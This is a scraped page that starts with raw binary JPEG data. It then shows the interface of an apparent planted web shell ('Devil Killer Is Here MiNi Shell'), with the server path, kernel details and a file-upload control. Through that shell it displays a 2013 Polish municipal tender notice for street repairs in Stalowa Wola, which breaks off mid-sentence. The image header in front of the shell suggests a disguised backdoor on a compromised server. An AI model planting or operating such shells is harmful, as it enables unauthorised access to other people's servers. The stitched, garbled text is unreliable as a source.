JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130621/239216-N-2013.html

<p class="kh_header"><b>Stalowa Wola: Remonty cząstkowe ulic w Stalowej Woli</b><br>
<b>Numer ogłoszenia: 239216 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stalowa Wola , ul. Wolności 7, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 6433456, faks 015 6433412.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty cząstkowe ulic w Stalowej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy użyciu mieszanki mineralno bitumicznej /na gorąco/ wytwarzanej w wytwórni mas bitumicznych, a w przypadku niesprzyjających warunków atmosferycznych przy użyciu mieszanki mineralno - bitumicznej wbudowywanej /na zimno/, wykonywania nakładek z mieszanki mineralno - bitumicznej, mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym wyrównaniu równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem, wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego mechanicznie gr 15 cm oraz położenia warstwy rumoszu asfaltowego lub kruszywa drogowego o grubości 5 cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem (materiał inwestora), przypowierzchniowa regulacja studzienek kanalizacji (studzienka rewizyjna, wpust uliczny), rozbiórka chodników z płyt chodnikowych lub kostki betonowej z utylizacją gruzu przez wykonawcę, ułożenie nowego chodnika z kostki betonowej na podsypce cementowo - piaskowej oraz ułożenie krawężników i obrzeży.
2. W trakcie obowiązywania umowy Zamawiający może dodatkowo zlecić pilne remonty, zagrażające bezpieczeństwu ruchu pojazdów i pieszych. Remonty te muszą być zrealizowane w dniu otrzymania ustnego zlecenia. W przypadku niemożności /z przyczyn nieprzewidzianych - siła wyższa/ wykonania remontu w dniu zlecenia Wykonawca
zobowiązany jest do natychmiastowego odpowiedniego oznakowania i zabezpieczenia ubytku oraz wykonania zlecenia natychmiast po ustaniu siły wyższej.
3. Szczegółowy zakres robót wg Szczegółowej Specyfikacji Technicznej
4. Przedmiot zamówienia w zakresie Części Nr I obejmuje:
1.) Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli
przy użyciu mieszanki mineralno-bitumicznej /na gorąco/ wytwarzanej w wytwórni
mas bitumicznych.
2.) Technologię robót określa :
- Szczegółowa Specyfikacja Techniczna D - 00.00. 00
- Szczegółowa Specyfikacja Techniczna D - 05.03.17
- Szczegółowa Specyfikacja Techniczna D - 05.03.11a
3.) Wspólny słownik zamówień CPV
45233142-6 - Roboty w zakresie naprawy dróg
5. Przedmiot zamówienia w zakresie Części II obejmuje:
1.) Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli
przy użyciu mieszanki mineralno - bitumicznej wbudowywanej /na zimno/.
2.) Technologię robót określa :
- Szczegółowa Specyfikacja Techniczna D - 00.00. 00
- Szczegółowa Specyfikacja Techniczna D - 05.03.17
3.) Wspólny słownik zamówień CPV
45233142-6 - Roboty w zakresie naprawy dróg
6. Przedmiot zamówienia w zakresie Części III obejmuje:
1.) Wykonywanie nakładek z mieszanki mineralno - bitumicznej o gr. 5cm.
2.) Technologię robót określa :
- Szczegółowa Specyfikacja Techniczna D - 00.00. 00.
- Szczegółowa Specyfikacja Techniczna D - 04.01.01
- Szczegółowa Specyfikacja Techniczna D - 05.03.05.
3.) Wspólny słownik zamówień CPV
45233140-2 - Roboty drogowe;
7. Przedmiot zamówienia w zakresie Części IV obejmuje:
1.) Mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym wyrównaniem
równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza
mas bitumicznych z zawałowaniem.
2.) Technologię robót określa :
- Szczegółowa Specyfikacja Techniczna D -00.00.00
- Szczegółowa Specyfikacja Techniczna D -04.04.00
3.) Wspólny słownik zamówień CPV
45233140-2 - Roboty drogowe;
8. Przedmiot zamówienia w zakresie Części V obejmuje:
1.) Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego
mechanicznie o gr 15 cm.
2.) Technologię robót określa :
- Szczegółowa Specyfikacja Techniczna D -00.00. 00
- Szczegółowa Specyfikacja Techniczna D -04.04. 00
3.) Wspólny słownik zamówień CPV
45233140-2 - Roboty drogowe;
9. Przedmiot zamówienia w zakresie Części VI obejmuje:
1.) Wykonanie przypowierzchniowej regulacji studzienek kanalizacji (studzienka
rewizyjna, wpust uliczny - w przypadku braku pierścienia odciążającego uzupełnić,
w przypadku uszkodzeń włazu lub wypustu należy wymienić na nowy) z rozebraniem
i odtworzeniem nawierzchni.
2.) Technologię robót określa :
- Szczegółowa Specyfikacja Techniczna D -03.02. 01.
- Szczegółowa Specyfikacja Techniczna D -03.02.01a
3.) Wspólny słownik zamówień CPV:
45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody
burzowej;
10. Przedmiot zamówienia w zakresie Części VII obejmuje:
1.) Rozebranie starej nawierzchni chodnika z kostki brukowej wraz z ułożeniem
nowej o grubości 6 cm z kostki brukowej na podsypce cementowo-piaskowej.
2.) Technologię robót określa:
- Szczegółowa Specyfikacja Techniczna D-01.02.04
- Szczegółowa Specyfikacja Techniczna D.05.03.23
3.) Wspólny słownik zamówień CPV:
45111100-9 - Roboty w zakresie burzenia
45233250-6 - Roboty w zakresie nawierzchni
11. Przedmiot zamówienia w zakresie Części VIII obejmuje:
1.) Rozebranie starej nawierzchni chodnika z płytek chodnikowych o wymiarach
50x50x7 lub 35x35x5 wraz z ułożeniem nowej o grubości 6 cm z kostki brukowej
na podsypce cementowo-piaskowej.
2.) Technologię robót określa:
- Szczegółowa Specyfikacja Techniczna D-01.02.04
- Szczegółowa Specyfikacja Techniczna D.05.03.23
3.) Wspólny słownik zamówień CPV:
45111100-9 - Roboty w zakresie burzenia
45233250-6 - Roboty w zakresie nawierzchni
12. Przedmiot zamówienia w zakresie Części IX obejmuje:
1.) Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej.
2.) Technologię robót określa:
- Szczegółowa Specyfikacja Techniczna D - 01.02.04
- Szczegółowa Specyfikacja Techniczna D - 08.01.01
3.) Wspólny słownik zamówień CPV:
45111100-9 - Roboty w zakresie burzenia
45233252-0 - Roboty w zakresie nawierzchni ulic
13. Przedmiot zamówienia w zakresie Części X obejmuje:
1.) Wykonanie warstwy rumoszu asfaltowego lub kruszywa drogowego o grubości
5 cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem (materiał Zamawiającego).
2.) Technologię robót określa:
- Szczegółowa Specyfikacja Techniczna D -00.00.00
- Szczegółowa Specyfikacja Techniczna D -04.04.00
3.) Wspólny słownik zamówień CPV
45233140-2 - Roboty drogowe;
14. Technologię robót określają Szczegółowe Specyfikacje Techniczne załączone do
SIWZ.
15. Dla Części VII, VIII, IX Zamówienia materiał z rozbiórki należy każdorazowo
przekazać Zamawiającemu lub na żądanie Zamawiającego zutylizować na własny
koszt. Dla Części X Zamówienia należy doliczyć koszty transportu z miejsca
składowania do miejsca wbudowania - realizacji przedmioty zamówienia.
16. Dla części I zamówienia zamawiający dopuszcza przygotowywanie ubytków
powierzchni asfaltowych tylko poprzez użycie frezarki mechanicznej.
17. Na wykonawcy spoczywa obowiązek opracowania i uzgodnienia projektów
tymczasowej organizacji ruchu na czas wykonywania robót remontowych.
18. Liczby podane w rozdziale 13 Specyfikacji Istotnych Warunków Zamówienia, są jedynie
przewidywanymi ilościami robót koniecznych do realizacji przedmiotu zamówienia,
oznacza to iż mogą ulec zmianie. Wprowadzone zostały w celu wyłonienia
najkorzystniejszej ekonomicznie oferty przetargowej.
19. Zamawiający przewiduje możliwość składania ofert częściowych - wykonawca
może złożyć ofertę na jedną lub większą ilość części;
20. W sytuacji gdy Zamawiający opisał przedmiot zamówienia przez wskazanie
znaków towarowych, patentów lub pochodzenia, to należy rozumieć, iż dopuszcza
się zastosowanie rozwiązań równoważnych.
21. Zamawiający dopuszcza zastosowanie równoważnych materiałów budowlanych,
wymienionych w Specyfikacji Istotnych Warunków Zamówienia i szczegółowych
specyfikacjach technicznych dla zadania: Remonty cząstkowe ulic w Stalowej
Woli, pod warunkiem, że materiały równoważne będą posiadały co najmniej takie
same parametry techniczne jak materiały wymienione w w/w dokumentach.
22. Na wykonawcy spoczywa obowiązek wykazania, iż oferowane dostawy
(urządzenia i materiały budowlane), usługi lub roboty budowlane spełniają
wymagania Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2, 45.23.21.30-2, 45.11.11.00-9, 45.23.32.50-6, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na podstawie art.
22 ust. 1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I,III zamówienia - wykaże iż wykonał w okresie ostatnich 5 lat przed
upływem terminu składania ofert, a jeżeli okres działalności wykonawcy jest
krótszy - to w tym okresie, co najmniej 2 zadania odpowiadające swoim
rodzajem robotom drogowym stanowiącym przedmiot zamówienia o wartości
każdego z nich nie mniejszej niż 400 000 zł brutto każde, co winien potwierdzić
dowodami o ich należytym wykonaniu.
- Dla części V,VII,VIII zamówienia - wykaże iż wykonał w okresie ostatnich 5 lat
przed upływem terminu składania ofert, a jeżeli okres działalności wykonawcy
jest krótszy - to w tym okresie, co najmniej 2 zadania odpowiadające swoim
rodzajem robotom stanowiącym przedmiot zamówienia o wartości każdego z
nich nie mniejszej niż 100 000 zł brutto każde, co winien potwierdzić dowodami
o ich należytym wykonaniu.
- Dla części IV zamówienia - wykonał w okresie ostatnich 5 lat przed upływem
terminu składania ofert, a jeżeli okres działalności wykonawcy jest krótszy - to w
tym okresie, co najmniej 2 zadania odpowiadające swoim rodzajem robotom
stanowiącym przedmiot zamówienia o wartości każdego z nich nie mniejszej niż
50 000 zł brutto co winien potwierdzić dowodami o ich należytym wykonaniu.
- Dla części II,VI,IX,X zamówienia - wykonał w okresie ostatnich 5 lat przed
upływem terminu składania ofert, a jeżeli okres działalności wykonawcy jest
krótszy - to w tym okresie, co najmniej 2 zadania odpowiadające swoim
rodzajem robotom stanowiącym przedmiot zamówienia o wartości każdego z
nich nie mniejszej niż 10 000 zł brutto każde, co winien potwierdzić dowodami o
ich należytym wykonaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I,II,III,IV,V oraz X zamówienia - dysponuje lub będzie dysponował
niezbędnymi do wykonania zamówienia narzędziami i urządzeniami tj. co
najmniej:
- wytwórnia stacjonarna (otaczarki) do wytwarzania mieszanek mineralnoasfaltowych,
- rozściełacz masy bitumicznej,
- walec statyczny stalowy,
- walec drogowy ogumiony,
- skrapiarkę do bitumu,
- samochody samowyładowcze o ładowności min. 10 t.,
- koparkę,
- frezarka drogowa,
- zagęszczarkę wibracyjną powierzchniową o ciężarze powyżej 500 kg,
- mechaniczna szczotka do zamiatania
- Dla części VI,VII,VIII oraz IX zamówienia - warunek zostanie pełniony jeżeli
wykonawca jeżeli wykonawca złoży oświadczenie na podstawie art. 22 ust. 1
ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla części I,II,III,IV,V,VI,X zamówienia - dysponuje lub będzie dysponował
kadrą techniczną z uprawnieniami i kwalifikacjami z branży, która występuje przy
realizacji przedmiotu zamówienia tj. kierownikiem robót w branży drogowej,
- Dla części VII,VIII,IX zamówienia - dysponuje lub będzie dysponował kadrą
techniczną z uprawnieniami i kwalifikacjami z branży, która występuje przy
realizacji przedmiotu zamówienia tj. kierownikiem robót w branży budowlanej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla części I,III zamówienia - zostanie spełniony jeżeli wykonawca wykaże, iż
znajduje się w sytuacji finansowej zapewniającej wykonanie zamówienia tj.:
posiada własne środki finansowe lub zdolność kredytową zapewniającą
realizację zamówienia w wysokości minimum 400 000 zł;
- Dla części V,VII,VIII zamówienia - zostanie spełniony jeżeli wykonawca
wykaże, iż znajduje się w sytuacji finansowej zapewniającej wykonanie
zamówienia tj.: posiada własne środki finansowe lub zdolność kredytową
zapewniającą realizację zamówienia w wysokości minimum 100 000 zł;
- Dla części IV zamówienia - zostanie spełniony jeżeli wykonawca wykaże, iż
znajduje się w sytuacji finansowej zapewniającej wykonanie zamówienia tj.:
posiada własne środki finansowe lub zdolność kredytową zapewniającą
realizację zamówienia w wysokości minimum 50 000 zł;
- Dla części II,VI,IX,X zamówienia - zostanie spełniony jeżeli wykonawca
wykaże, iż znajduje się w sytuacji finansowej zapewniającej wykonanie
zamówienia tj.: posiada własne środki finansowe lub zdolność kredytową
zapewniającą realizację zamówienia w wysokości minimum 10 000 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Na ofertę składają się następujące dokumenty i załączniki:
1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę,
2. Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1
ustawy Prawo zamówień publicznych - załącznik nr 4,
3. Parafowany wzór umowy - załącznik nr 6,
4. zakres robót powierzony podwykonawcom - załącznik nr 7.
5. Informacja zgodnie z art. 24 ust. 2 pkt 5 ustawy z dnia 29.01.2004 r - Prawo
